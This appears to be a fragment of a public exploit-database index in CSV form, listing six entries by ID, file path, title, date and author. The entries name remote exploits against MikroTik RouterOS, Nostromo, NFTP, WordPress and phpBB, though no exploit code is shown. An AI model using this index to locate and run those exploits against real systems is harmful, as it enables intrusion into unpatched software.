47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.